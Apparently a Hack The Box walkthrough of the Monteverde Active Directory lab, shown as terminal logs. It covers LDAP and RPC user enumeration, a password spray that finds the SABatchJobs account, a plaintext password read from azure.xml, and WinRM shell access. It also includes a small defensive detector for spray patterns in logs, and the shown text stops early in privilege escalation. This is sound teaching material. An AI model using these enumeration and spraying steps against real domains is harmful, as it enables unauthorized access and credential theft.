Monteverde

nmap scan

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ nmap -sV -sC -oA mantis  10.10.10.172 -pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-24 07:41 EDT
zsh: segmentation fault  nmap -sV -sC -oA mantis 10.10.10.172 -pn
                                                                                                                                                                                                        
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ nmap -sV -sC -oA Monteverde  10.10.10.172 -Pn  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-24 07:41 EDT
Nmap scan report for 10.10.10.172
Host is up (0.36s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-24 11:42:15Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-09-24T11:42:53
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.93 seconds
                                                                                                                                                                                                        
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ 

Running a full port scan in the background to check later whether any other ports are open.

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u '' -p ''
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\: 
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]

adding the domain and the DC hostname to /etc/hosts

127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.192    blackfield.local
10.10.10.182    cascade.local
10.10.11.152    timelapse.htb
10.10.10.169    megabank.local  resolute.megabank.local
10.10.10.52     htb.local  mantis.htb.local
10.10.10.179    MEGACORP.LOCAL  MULTIMASTER.MEGACORP.LOCAL
10.10.10.172    MEGABANK.LOCAL  MONTEVERDE.MEGABANK.LOCAL

doing an ldapsearch against the DC; an anonymous simple bind is accepted, and a search for person objects gives us a list of users

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ldapsearch -x -H ldap://10.10.10.172 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=MEGABANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=MEGABANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=MEGABANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=MEGABANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
                                                                                                                                                                                                        
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ldapsearch -x -H ldap://10.10.10.172 -b 'DC=megabank,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
Guest
MONTEVERDE$
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
                                                                                                                                                                                                        
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ 

adding the names to a text file, users.txt

using kerbrute to confirm which of them are valid domain accounts

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ./kerbrute userenum --dc 10.10.10.172 -d  megabank.LOCAL users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/24/23 - Ronnie Flathers @ropnop

2023/09/24 07:53:54 >  Using KDC(s):
2023/09/24 07:53:54 >   10.10.10.172:88

2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  [+] VALID USERNAME:       [email protected]
2023/09/24 07:53:55 >  Done! Tested 11 usernames (11 valid) in 0.864 seconds
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]

Checking whether any of these users has Kerberos pre-authentication disabled so we could get an AS-REP hash, but none of them do

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ while read -r user; do
    ./GetNPUsers.py megabank.LOCAL/$user -no-pass -dc-ip 10.10.10.172
done < /home/kali/HTB/Monteverde/users.txt 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for administrator
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for MONTEVERDE$
[-] User MONTEVERDE$ doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for AAD_987d7f2f57d2
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for mhope
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for SABatchJobs
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for svc-ata
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for svc-bexec
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for svc-netapp
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for dgalanos
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for roleary
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for smorgan
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                   
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ 

checking the account descriptions via ldapsearch, but nothing useful; the only non-default description is on AAD_987d7f2f57d2, the synchronization service account, which is worth noting for later

└─$ ldapsearch -x -H ldap://10.10.10.172 -b "DC=megabank,DC=local" -s sub "(objectClass=user)" sAMAccountName description
# extended LDIF
#
# LDAPv3
# base <DC=megabank,DC=local> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName description 
#

# Guest, Users, MEGABANK.LOCAL
dn: CN=Guest,CN=Users,DC=MEGABANK,DC=LOCAL
description: Built-in account for guest access to the computer/domain
sAMAccountName: Guest

# MONTEVERDE, Domain Controllers, MEGABANK.LOCAL
dn: CN=MONTEVERDE,OU=Domain Controllers,DC=MEGABANK,DC=LOCAL
sAMAccountName: MONTEVERDE$

# AAD_987d7f2f57d2, Users, MEGABANK.LOCAL
dn: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
description: Service account for the Synchronization Service with installation
  identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVER
 DE.
sAMAccountName: AAD_987d7f2f57d2

# Mike Hope, London, MegaBank Users, MEGABANK.LOCAL
dn: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: mhope

# SABatchJobs, Service Accounts, MEGABANK.LOCAL
dn: CN=SABatchJobs,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: SABatchJobs

# svc-ata, Service Accounts, MEGABANK.LOCAL
dn: CN=svc-ata,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: svc-ata

# svc-bexec, Service Accounts, MEGABANK.LOCAL
dn: CN=svc-bexec,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: svc-bexec

# svc-netapp, Service Accounts, MEGABANK.LOCAL
dn: CN=svc-netapp,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: svc-netapp

# Dimitris Galanos, Athens, MegaBank Users, MEGABANK.LOCAL
dn: CN=Dimitris Galanos,OU=Athens,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: dgalanos

# Ray O'Leary, Toronto, MegaBank Users, MEGABANK.LOCAL
dn: CN=Ray O'Leary,OU=Toronto,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: roleary

# Sally Morgan, New York, MegaBank Users, MEGABANK.LOCAL
dn: CN=Sally Morgan,OU=New York,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: smorgan

# search reference
ref: ldap://ForestDnsZones.MEGABANK.LOCAL/DC=ForestDnsZones,DC=MEGABANK,DC=LOC
 AL

# search reference
ref: ldap://DomainDnsZones.MEGABANK.LOCAL/DC=DomainDnsZones,DC=MEGABANK,DC=LOC
 AL

# search reference
ref: ldap://MEGABANK.LOCAL/CN=Configuration,DC=MEGABANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 15
# numEntries: 11
# numReferences: 3

also checked for custom object classes and attributes, but nothing stands out. Excerpt below:

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ldapsearch -x -H ldap://10.10.10.172 -b 'DC=megabank,DC=local' -s sub | awk '{print $1}' | sort | uniq -c | sort -nr
    697 dSCorePropagationData:
    548 objectClass:
    281 #
    272 
    267 dn:
    246 whenCreated:
    246 whenChanged:
    246 uSNCreated:
    246 uSNChanged:
    246 objectGUID::
    246 objectCategory:
    246 name:
    246 instanceType:
    246 distinguishedName:
    222 cn:
    177 showInAdvancedViewOnly:
    102 System,DC=MEGABANK,DC=LOCAL
     88 BANK.LOCAL
     87 mainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
     87 isCriticalSystemObject:

trying rpcclient with a null session; we find the same users, and also the domain groups (note the Azure Admins group)

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ rpcclient -U '' -N 10.10.10.172
rpcclient $> lookup smorgan
command not found: lookup
rpcclient $> lookupnames smorgan
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lookupnames SABatchJobs
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
rpcclient $> 
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]
rpcclient $> 

trying to enumerate the shares anonymously, but access is denied

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u '' -p ''
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\: 
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u '' -p '' --shares        
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\: 
SMB         10.10.10.172    445    MONTEVERDE       [-] Error enumerating shares: STATUS_ACCESS_DENIED
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient -L //10.10.10.172       
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient -L //10.10.10.172 -N -U%                

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                            

Running out of options, so the next step is to build a password list and try it against the accounts.

First we check the password policy and we can see “Account Lockout Threshold: None”, so trying passwords against the accounts will not lock anyone out

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 --pass-pol
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] Dumping password info for domain: MEGABANK
SMB         10.10.10.172    445    MONTEVERDE       Minimum password length: 7
SMB         10.10.10.172    445    MONTEVERDE       Password history length: 24
SMB         10.10.10.172    445    MONTEVERDE       Maximum password age: 41 days 23 hours 53 minutes 
SMB         10.10.10.172    445    MONTEVERDE       
SMB         10.10.10.172    445    MONTEVERDE       Password Complexity Flags: 000000
SMB         10.10.10.172    445    MONTEVERDE           Domain Refuse Password Change: 0
SMB         10.10.10.172    445    MONTEVERDE           Domain Password Store Cleartext: 0
SMB         10.10.10.172    445    MONTEVERDE           Domain Password Lockout Admins: 0
SMB         10.10.10.172    445    MONTEVERDE           Domain Password No Clear Change: 0
SMB         10.10.10.172    445    MONTEVERDE           Domain Password No Anon Change: 0
SMB         10.10.10.172    445    MONTEVERDE           Domain Password Complex: 0
SMB         10.10.10.172    445    MONTEVERDE       
SMB         10.10.10.172    445    MONTEVERDE       Minimum password age: 1 day 4 minutes 
SMB         10.10.10.172    445    MONTEVERDE       Reset Account Lockout Counter: 30 minutes 
SMB         10.10.10.172    445    MONTEVERDE       Locked Account Duration: 30 minutes 
SMB         10.10.10.172    445    MONTEVERDE       Account Lockout Threshold: None
SMB         10.10.10.172    445    MONTEVERDE       Forced Log off Time: Not Set

Creating a password list with John the Ripper, using the usernames as the seed words and applying its rules

└─$ john --wordlist=users.txt --rules --stdout > users2.txt

using crackmapexec to try the generated list against every user

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u users.txt -p users4.txt

SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 

one hit: the service account SABatchJobs has its own name as its password
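From the defender's side, the spray above only works because the policy has no lockout threshold, so the one remaining signal is the log pattern: one source failing against many accounts, then a success. Added example (not from the write-up or from crackmapexec): a small detector for that pattern, run over constructed Security log lines in a flattened format of my own; the event IDs 4625 and 4624 are real, the IP addresses and timestamps are made up.

```python
"""Detect the password-spray pattern the policy above allows (no lockout,
one source trying many accounts) from Windows Security log lines.

Added example for this write-up, not code from the box or the tools used.
Event IDs 4625 (logon failure) and 4624 (logon success) are the real ones a
DC records; the log lines, field layout and IP addresses below are constructed
for illustration, not captured output."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 10.10.14.5 sprays one password across the domain users
# enumerated above and gets a hit on SABatchJobs; 10.10.20.9 is an ordinary
# user who mistyped a password once and then logged in normally.
SAMPLE_LOG = """\
2023-09-24T12:01:03 4625 TargetUserName=administrator IpAddress=10.10.14.5 Status=0xC000006D
2023-09-24T12:01:03 4625 TargetUserName=mhope IpAddress=10.10.14.5 Status=0xC000006D
2023-09-24T12:01:04 4625 TargetUserName=svc-ata IpAddress=10.10.14.5 Status=0xC000006D
2023-09-24T12:01:04 4625 TargetUserName=svc-bexec IpAddress=10.10.14.5 Status=0xC000006D
2023-09-24T12:01:05 4625 TargetUserName=svc-netapp IpAddress=10.10.14.5 Status=0xC000006D
2023-09-24T12:01:05 4625 TargetUserName=dgalanos IpAddress=10.10.14.5 Status=0xC000006D
2023-09-24T12:01:06 4625 TargetUserName=roleary IpAddress=10.10.14.5 Status=0xC000006D
2023-09-24T12:01:06 4625 TargetUserName=smorgan IpAddress=10.10.14.5 Status=0xC000006D
2023-09-24T12:01:07 4624 TargetUserName=SABatchJobs IpAddress=10.10.14.5 Status=0x0
2023-09-24T12:03:10 4625 TargetUserName=mhope IpAddress=10.10.20.9 Status=0xC000006A
2023-09-24T12:03:20 4624 TargetUserName=mhope IpAddress=10.10.20.9 Status=0x0
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<eid>\d{4}) TargetUserName=(?P<user>\S+) "
    r"IpAddress=(?P<ip>\S+) Status=(?P<status>\S+)$"
)


def parse_events(text):
    """Turn the flattened log lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        ev["eid"] = int(ev["eid"])
        events.append(ev)
    return events


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Flag a source IP once its 4625 failures cover >= min_users distinct
    accounts inside `window`; then record any 4624 success from that source
    within the window, which is the account to reset first.

    Returns {ip: {"start": datetime, "accounts_tried": set, "compromised": list}}."""
    events = sorted(events, key=lambda e: e["ts"])
    failures = defaultdict(list)  # ip -> [(ts, user), ...]
    alerts = {}
    for ev in events:
        ip = ev["ip"]
        if ev["eid"] == 4625:
            failures[ip].append((ev["ts"], ev["user"].lower()))
            # keep only failures from this source inside the sliding window
            recent = [(t, u) for t, u in failures[ip] if ev["ts"] - t <= window]
            users = {u for _, u in recent}
            if ip in alerts:
                alerts[ip]["accounts_tried"] |= users
            elif len(users) >= min_users:
                alerts[ip] = {"start": recent[0][0], "accounts_tried": users,
                              "compromised": []}
        elif ev["eid"] == 4624 and ip in alerts:
            # a success from a spraying source inside the window is the hit
            if ev["ts"] - alerts[ip]["start"] <= window:
                alerts[ip]["compromised"].append(ev["user"])
    return alerts


if __name__ == "__main__":
    for ip, a in detect_spray(parse_events(SAMPLE_LOG)).items():
        print(f"[!] spray from {ip} starting {a['start']:%H:%M:%S}: "
              f"{len(a['accounts_tried'])} accounts tried, "
              f"successful logons after the spray: {a['compromised'] or 'none'}")
```

Setting a lockout threshold would stop the spray outright; the detector covers the case, as on this box, where that control is absent.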

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u SABatchJobs -p SABatchJobs --shares
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.10.10.172    445    MONTEVERDE       [+] Enumerated shares
SMB         10.10.10.172    445    MONTEVERDE       Share           Permissions     Remark
SMB         10.10.10.172    445    MONTEVERDE       -----           -----------     ------
SMB         10.10.10.172    445    MONTEVERDE       ADMIN$                          Remote Admin
SMB         10.10.10.172    445    MONTEVERDE       azure_uploads   READ            
SMB         10.10.10.172    445    MONTEVERDE       C$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       E$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       IPC$            READ            Remote IPC
SMB         10.10.10.172    445    MONTEVERDE       NETLOGON        READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       SYSVOL          READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       users$          READ            
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec winrm 10.10.10.172 -u SABatchJobs -p SABatchJobs --shares
usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell]
                    [--verbose]
                    {ldap,smb,mssql,rdp,ftp,winrm,ssh} ...
crackmapexec: error: unrecognized arguments: --shares
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec winrm 10.10.10.172 -u SABatchJobs -p SABatchJobs         
SMB         10.10.10.172    5985   MONTEVERDE       [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
HTTP        10.10.10.172    5985   MONTEVERDE       [*] http://10.10.10.172:5985/wsman
WINRM       10.10.10.172    5985   MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient //10.10.10.172/users$ -U SABatchJobs%SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jan  3 08:12:48 2020
  ..                                  D        0  Fri Jan  3 08:12:48 2020
  dgalanos                            D        0  Fri Jan  3 08:12:30 2020
  mhope                               D        0  Fri Jan  3 08:41:18 2020
  roleary                             D        0  Fri Jan  3 08:10:30 2020
  smorgan                             D        0  Fri Jan  3 08:10:24 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \> cd dgalanos\
smb: \dgalanos\> ls
  .                                   D        0  Fri Jan  3 08:12:30 2020
  ..                                  D        0  Fri Jan  3 08:12:30 2020
cd .
                31999 blocks of size 4096. 28979 blocks available
smb: \dgalanos\> cd ../
smb: \> cd mhop
cd \mhop\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd mhope
smb: \mhope\> ls
  .                                   D        0  Fri Jan  3 08:41:18 2020
  ..                                  D        0  Fri Jan  3 08:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 08:40:23 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \mhope\> get azure.xml 
getting file \mhope\azure.xml of size 1212 as azure.xml (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \mhope\> cd ../
smb: \> cd rolearty
cd \rolearty\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd roleary
smb: \roleary\> ls
  .                                   D        0  Fri Jan  3 08:10:30 2020
  ..                                  D        0  Fri Jan  3 08:10:30 2020
cd ../
                31999 blocks of size 4096. 28979 blocks available
smb: \roleary\> cd ../
smb: \> cd smorgan
smb: \smorgan\> ls
  .                                   D        0  Fri Jan  3 08:10:24 2020
  ..                                  D        0  Fri Jan  3 08:10:24 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \smorgan\> ^C
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient //10.10.10.172/azure_uploads -U SABatchJobs%SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jan  3 07:43:06 2020
  ..                                  D        0  Fri Jan  3 07:43:06 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \> SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now

checking the xml file: it is a PowerShell Export-Clixml serialisation of an Azure AD PSADPasswordCredential object

└─$ cat azure.xml 
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ 

we see a password in there: 4n0therD4y@n0th3r$

we try the password against all the users and it turns out to be mhope's password; it is not reused by the other accounts

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ls
azure.xml  mantis.gnmap  mantis.xml        Monteverde.nmap  users2.txt  users4.txt
kerbrute   mantis.nmap   Monteverde.gnmap  Monteverde.xml   users3.txt  users.txt
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ nano users.txt
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.179 -u users.txt -p '4n0therD4y@n0th3r$'  
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u users.txt -p '4n0therD4y@n0th3r$'
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\administrator:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ 
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ 

mhope is allowed to log in over WinRM, so we use evil-winrm to get a shell and read user.txt

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec winrm 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
SMB         10.10.10.172    5985   MONTEVERDE       [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
HTTP        10.10.10.172    5985   MONTEVERDE       [*] http://10.10.10.172:5985/wsman
WINRM       10.10.10.172    5985   MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)
                                                                                                   
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ evil-winrm -i  10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ../
*Evil-WinRM* PS C:\Users\mhope> cd Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
bfec682a8877066eb64829042af046a4
*Evil-WinRM* PS C:\Users\mhope\Desktop> 

Privilege escalation

downloading and running winPEAS on the box

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ evil-winrm -i  10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'

winPEAS suggested looking at the file “RoamingCredentialSettings.xml”, so we downloaded it (the first attempt used “get”, which is not an evil-winrm command; “download” is)

*Evil-WinRM* PS C:\users\all users\Microsoft\uEV\InboxTemplates> get RoamingCredentialSettings.xml
The term 'get' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ get RoamingCredentialSettings.xml
+ ~~~
